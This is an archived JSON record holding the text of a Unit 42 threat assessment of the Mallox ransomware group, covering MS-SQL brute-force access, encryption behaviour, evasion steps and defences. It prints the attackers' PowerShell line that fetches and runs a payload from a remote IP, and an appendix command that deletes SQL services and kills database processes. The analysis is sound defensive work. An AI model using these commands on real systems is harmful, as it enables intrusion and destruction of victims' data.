{
	"id": "0c3e19c4-d4cf-4e03-bbce-5357d72531ad",
	"created_at": "2026-04-06T00:15:16.25822Z",
	"updated_at": "2026-04-10T13:12:32.704045Z",
	"deleted_at": null,
	"sha1_hash": "782fcd13b87464c272b73cdc5e89186422fd5851",
	"title": "Threat Group Assessment: Mallox Ransomware",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1039324,
	"plain_text": "Threat Group Assessment: Mallox Ransomware\r\nBy Lior Rochberger, Shimi Cohen\r\nPublished: 2023-07-20 · Archived: 2026-04-05 16:22:09 UTC\r\nExecutive Summary\r\nMallox (aka TargetCompany, FARGO and Tohnichi) is a ransomware strain that targets Microsoft (MS) Windows\r\nsystems. It has been active since June 2021, and is notable for exploiting unsecured MS-SQL servers as a\r\npenetration vector to compromise victims' networks.\r\nRecently, Unit 42 researchers have observed an uptick of Mallox ransomware activities – with an increase of\r\nalmost 174% compared to the previous year – exploiting MS-SQL servers to distribute the ransomware. Unit 42\r\nincident responders have observed Mallox ransomware using brute forcing, data exfiltration and tools such as\r\nnetwork scanners. In addition, we have found indications that the group is working on expanding their operations\r\nand recruiting affiliates on hacking forums.\r\nPalo Alto Networks customers receive protections from Mallox ransomware and the techniques discussed in this\r\nblog through Cortex XDR, which provides a multilayer defense that includes behavioral threat protection and\r\nexploit protection.\r\nVideo showing Cortex preventing the execution of the Mallox ransomware.\r\nThe Advanced WildFire cloud-delivered malware analysis service accurately identifies samples related to Mallox\r\nas malicious. 
Cloud-Delivered Security Services, including Advanced URL Filtering and DNS Security, identify\r\ndomains associated with this group as malicious.\r\nIf you believe you have been compromised, the Unit 42 Incident Response team can provide a personalized\r\nresponse.\r\nOverview of Mallox Ransomware\r\nThe Mallox ransomware group, like many other ransomware threat actors, follows the double extortion trend: stealing data\r\nbefore encrypting an organization’s files, and then threatening to publish the stolen data on a leak site as leverage\r\nto convince victims to pay the ransom fee.\r\nFigure 1 below displays the Mallox ransomware website on the Tor browser. Though the organizations’ names and\r\nlogos have been redacted, this is how the group displays the leaked data of its targets.\r\nhttps://unit42.paloaltonetworks.com/mallox-ransomware/\r\nPage 1 of 13\n\nFigure 1. Mallox website on Tor browser.\r\nEach victim is given a private key to interact with the group and negotiate terms and payment. Figure 2 below\r\npresents the chat used for communicating with the group.\r\nFigure 2. Mallox private chat Tor website.\r\nThe Mallox ransomware group claims hundreds of victims. While the actual number of victims remains unknown,\r\nour telemetry indicates dozens of potential victims worldwide, across multiple industries, including\r\nmanufacturing, professional and legal services, and wholesale and retail.\r\nSince the beginning of 2023, there has been a constant uptick in Mallox activities. According to our telemetry and\r\ndata collected from open threat intel sources, in 2023, there has been an increase of approximately 174% in\r\nMallox attacks compared to the latter half of 2022 (see Figure 3).\r\nFigure 3. Mallox attack attempts from the second half of 2022 to the first half of 2023, based on\r\nPalo Alto Networks' telemetry.\r\nInitial Access\r\nSince its emergence in 2021, the Mallox group has kept the same approach to gaining initial access: the group\r\ntargets unsecured MS-SQL servers to infiltrate a network. These attacks start with a dictionary brute force attack,\r\ntrying a list of known or commonly used passwords against the MS-SQL servers. After gaining access, the\r\nattackers use a command line and PowerShell to download the Mallox ransomware payload from a remote server\r\n(see Figure 4).\r\nFigure 4. Example of an alert for a Mallox ransomware dictionary brute force attack, as raised by\r\nCortex XDR and XSIAM.\r\nA command line example used for a Mallox ransomware infection:\r\n\"\\\"C:\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe\\\" /C echo $cl = New-Object System.Net.WebClient \u003e\r\nC:\\Users\\MSSQLS~1\\AppData\\Local\\Temp\\updt.ps1 \u0026 echo\r\n$cl.DownloadFile(\\\"hxxp://80.66.75[.]36/aRX.exe\\\",\r\n\\\"C:\\Users\\MSSQLS~1\\AppData\\Local\\Temp\\tzt.exe\\\") \u003e\u003e %TEMP%\\\\updt.ps1 \u0026 powershell -ExecutionPolicy Bypass C:\\Users\\MSSQLS~1\\AppData\\Local\\Temp\\updt.ps1 \u0026 WMIC process call\r\ncreate \\\"C:\\Users\\MSSQLS~1\\AppData\\Local\\Temp\\tzt.exe\\\"\"\r\nThis command line does the following:\r\nDownloads the ransomware payload from: hxxp://80.66.75[.]36/aRX.exe, and saves it as tzt.exe\r\nRuns a PowerShell script named updt.ps1\r\nThe payload then goes on to do the following (not pictured in the command line script shown above):\r\nDownloads another file named system.bat, and saves it as tzt.bat\r\nThe tzt.bat file is used to create a user named SystemHelp and enable the Remote Desktop Protocol (RDP)\r\nExecutes the ransomware payload tzt.exe using Windows Management Instrumentation (WMI)\r\nFigure 5 below shows how Cortex XDR and XSIAM detect one of the first phases of the SQL server exploitation,\r\nas described above.\r\nFigure 5. SQL server exploitation process tree, as shown by Cortex XDR and XSIAM (set to detect-only mode for testing purposes).\r\nRansomware Execution\r\nBefore any encryption takes place, the ransomware payload attempts multiple actions to ensure that the\r\nransomware runs successfully, such as:\r\nAttempts to stop and remove SQL-related services using sc.exe and net.exe (see the Appendix for the full\r\ncommand line). This way, the ransomware can access and encrypt the victim’s file data.\r\nAttempts to delete volume shadow copies, making it harder to restore files once they are encrypted. See Figure 6\r\nfor how this alert appears in Cortex XDR and XSIAM.\r\nFigure 6. Alert for deleting shadow copies, raised by Cortex XDR and XSIAM.\r\nAttempts to clear the application, security, setup and system event logs using Microsoft’s wevtutil\r\ncommand line utility to thwart detection and forensic analysis efforts.\r\nModifies file permissions using the Windows built-in takeown.exe command, denying access to cmd.exe\r\nand other key system processes.\r\nPrevents the system administrator from manually loading the System Image Recovery feature using\r\nbcdedit.exe.\r\nAttempts to terminate security-related processes and services using taskkill.exe to evade security solutions.\r\nAttempts to bypass the Raccine anti-ransomware product, if present, by deleting its registry key. See Figure\r\n7 for an example of this process.\r\nFigure 7. Deleting the Raccine registry key.\r\nFigure 8 shows some of these activities in the process tree of the ransomware:\r\nFigure 8. A full process tree of the attack, as shown by Cortex XDR and XSIAM (set to detect-only\r\nmode for testing purposes).\r\nThe investigated sample of Mallox ransomware encrypts files using the ChaCha20 encryption algorithm and\r\nappends the .malox extension to the encrypted files. Other file extensions observed were: .FARGO3, .exploit,\r\n.avast, .bitenc and .xollam, in addition to the use of victims’ names as the extension. See Figure 9 for an example\r\nof encrypted files in Cortex XDR.\r\nFigure 9. Examples of files encrypted by Mallox ransomware, as detected by Cortex XDR (set to\r\ndetect-only mode).\r\nMallox leaves a ransom note in every directory on the victim’s drive. This ransom note explains the infection and\r\nprovides contact information. Figure 10 is an example of one of these ransom notes.\r\nFigure 10. Example of Mallox ransom note.\r\nAfter execution, the malware deletes itself.\r\nGrowing Potential\r\nAccording to one of its members – as stated in an interview in January 2023 – Mallox is a relatively small and\r\nclosed group. However, the group appears to be working to expand its operations by recruiting affiliates.\r\nA few days after this interview, a user named Mallx posted on the hacking forum RAMP that the Mallox\r\nransomware group was recruiting affiliates for a new Mallox ransomware-as-a-service (RaaS) affiliate program, as\r\nshown in Figure 11.\r\nFigure 11. User Mallx's post on RAMP.\r\nBack in May 2022, a user named RansomR posted on the well-known hacking forum nulled[.]to that the Mallox\r\ngroup was looking for affiliates to join the team. As of June 2023, the offer to join was still open, according to\r\nthe comments in the thread.\r\nFigure 12. RansomR's post on Nulled.\r\nIf recruitment efforts for its affiliate program succeed, the Mallox group might expand its reach to target more\r\norganizations.\r\nConclusion\r\nThe Mallox ransomware group has been more active in the past few months, and if its recent recruitment drive\r\nis successful, the group may be able to attack more organizations.\r\nOrganizations should implement security best practices and be prepared to defend against the ongoing threat of\r\nransomware. This is true not only for Mallox ransomware but for other opportunistic criminal groups as well.\r\nThe Unit 42 team recommends making sure that all internet-facing applications are configured properly and all\r\nsystems are patched and up to date wherever possible. These measures will help to reduce the attack surface,\r\nthereby limiting the exploitation techniques available to attackers.\r\nDeploy an XDR/EDR solution to perform in-memory inspection and detect process injection techniques. Perform\r\nthreat hunting, looking for signs of unusual behavior related to security product defense evasion, service accounts\r\nused for lateral movement and domain administrator-related user behavior.\r\nProtections and Mitigations\r\nPalo Alto Networks Cortex XDR detects and prevents file manipulation and other activities performed by Mallox\r\nransomware.\r\nFigure 13. End user notification for blocking the Mallox execution.\r\nFigure 14. Alert for suspicious file modification, raised by Cortex XDR and XSIAM (set to\r\ndetect-only mode for testing purposes).\r\nSmartScore, a unique ML-driven scoring engine that translates security investigation methods and their associated\r\ndata into a hybrid scoring system, scored an incident involving Mallox ransomware at 100, which is its highest\r\nlevel of severity (Figure 15). This type of scoring helps analysts determine which incidents are more urgent and\r\nprovides context about the reason for the assessment, assisting with prioritization.\r\nFigure 15. SmartScore information about a Mallox ransomware incident.\r\nFor Palo Alto Networks customers, our products and services provide the following coverage against Mallox\r\nransomware:\r\nThe WildFire cloud-based threat analysis service identifies the known samples as malicious.\r\nAdvanced URL Filtering and DNS Security identify domains associated with this group as malicious.\r\nCortex XDR detects user and credential-based threats by analyzing user activity from multiple data\r\nsources, including endpoints, network firewalls, Active Directory, identity and access management\r\nsolutions, and cloud workloads. Cortex XDR also builds behavioral profiles of user activity with machine\r\nlearning. By comparing new activity to past activity, peer activity and the expected behavior, Cortex XDR\r\ndetects anomalous activity indicative of credential-based attacks. Cortex XDR also offers the following\r\nprotections related to the attacks discussed in this post:\r\nPrevents the execution of known malware, and prevents the execution of unknown\r\nmalware using Behavioral Threat Protection and machine learning based on the Local Analysis\r\nmodule.\r\nProtects against credential gathering tools and techniques using the new Credential Gathering\r\nProtection available from Cortex XDR 3.4.\r\nProtects against threat actors dropping and executing commands from webshells using Anti Webshell\r\nProtection as of Cortex XDR 3.4.\r\nProtects against exploitation of different vulnerabilities, including ProxyShell, ProxyLogon and\r\nOWASSRF, using the Anti-Exploitation modules as well as Behavioral Threat Protection.\r\nCortex XDR Pro detects post-exploit activity, including credential-based attacks, with Cortex\r\nAnalytics.\r\nIf you think you may have been impacted or have an urgent matter, get in touch with the Unit 42 Incident\r\nResponse team or call:\r\nNorth America Toll-Free: 866.486.4842 (866.4.UNIT42)\r\nEMEA: +31.20.299.3130\r\nAPAC: +65.6983.8730\r\nJapan: +81.50.1790.0200\r\nPalo Alto Networks has shared these findings, including file samples and indicators of compromise, with our\r\nfellow Cyber Threat Alliance (CTA) members. CTA members use this intelligence to rapidly deploy protections to\r\ntheir customers and to systematically disrupt malicious cyber actors. 
Learn more about the Cyber Threat Alliance.\r\nAppendix\r\nCommand Line Used by Mallox to Stop and Remove SQL-Related Services\r\n\"C:\\Windows\\System32\\cmd.exe\" /C sc delete \"MSSQLFDLauncher\" \u0026\u0026 sc delete \"MSSQLSERVER\" \u0026\u0026 sc delete \"SQLSERVERAGENT\" \u0026\u0026 sc delete \"SQLBrowser\" \u0026\u0026 sc delete \"SQLTELEMETRY\" \u0026\u0026 sc delete \"MsDtsServer130\" \u0026\u0026 sc delete \"SSISTELEMETRY130\" \u0026\u0026 sc delete \"SQLWriter\" \u0026\u0026 sc delete \"MSSQL$VEEAMSQL2012\" \u0026\u0026 sc delete \"SQLAgent$VEEAMSQL2012\" \u0026\u0026 sc delete \"MSSQL\" \u0026\u0026 sc delete \"SQLAgent\" \u0026\u0026 sc delete \"MSSQLServerADHelper100\" \u0026\u0026 sc delete \"MSSQLServerOLAPService\" \u0026\u0026 sc delete \"MsDtsServer100\" \u0026\u0026 sc delete \"ReportServer\" \u0026\u0026 sc delete \"SQLTELEMETRY$HL\" \u0026\u0026 sc delete \"TMBMServer\" \u0026\u0026 sc delete \"MSSQL$PROGID\" \u0026\u0026 sc delete \"MSSQL$WOLTERSKLUWER\" \u0026\u0026 sc delete \"SQLAgent$PROGID\" \u0026\u0026 sc delete \"SQLAgent$WOLTERSKLUWER\" \u0026\u0026 sc delete \"MSSQLFDLauncher$OPTIMA\" \u0026\u0026 sc delete \"MSSQL$OPTIMA\" \u0026\u0026 sc delete \"SQLAgent$OPTIMA\" \u0026\u0026 sc delete \"ReportServer$OPTIMA\" \u0026\u0026 sc delete \"msftesql$SQLEXPRESS\" \u0026\u0026 sc delete \"postgresql-x64-9.4\" \u0026\u0026 rem Kill \"SQL\" \u0026\u0026 taskkill -f -im sqlbrowser.exe \u0026\u0026 taskkill -f -im sqlwriter.exe \u0026\u0026 taskkill -f -im sqlservr.exe \u0026\u0026 taskkill -f -im msmdsrv.exe \u0026\u0026 taskkill -f -im MsDtsSrvr.exe \u0026\u0026 taskkill -f -im sqlceip.exe \u0026\u0026 taskkill -f -im fdlauncher.exe \u0026\u0026 taskkill -f -im Ssms.exe \u0026\u0026 taskkill -f -im SQLAGENT.EXE \u0026\u0026 taskkill -f -im fdhost.exe \u0026\u0026 taskkill -f -im fdlauncher.exe \u0026\u0026 taskkill -f -im sqlservr.exe \u0026\u0026 taskkill -f -im ReportingServicesService.exe \u0026\u0026 taskkill -f -im msftesql.exe \u0026\u0026 taskkill -f -im postgres.exe\r\nIndicators of Compromise\r\nSHA256 hashes for Mallox ransomware samples:\r\nSHA256 hashes for PowerShell scripts Updt.ps1 and Upddt.ps1\r\nSystem.bat\r\nIP addresses related to Mallox ransomware activity\r\nAdditional Resources\r\nRansomware Spotlight: TargetCompany – Trend Micro\r\nXollam, the Latest Face of TargetCompany – Trend Micro\r\nMallox Ransomware – K7 Security Labs, Blog\r\nFARGO Ransomware (Mallox) Being Distributed to Unsecured MS-SQL Servers – ASEC Blog, AhnLab\r\nInterview With Mallox Ransomware Group – SuspectFile\r\nSource: https://unit42.paloaltonetworks.com/mallox-ransomware/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://unit42.paloaltonetworks.com/mallox-ransomware/"
	],
	"report_names": [
		"mallox-ransomware"
	],
	"threat_actors": [],
	"ts_created_at": 1775434516,
	"ts_updated_at": 1775826752,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/782fcd13b87464c272b73cdc5e89186422fd5851.pdf",
		"text": "https://archive.orkl.eu/782fcd13b87464c272b73cdc5e89186422fd5851.txt",
		"img": "https://archive.orkl.eu/782fcd13b87464c272b73cdc5e89186422fd5851.jpg"
	}
}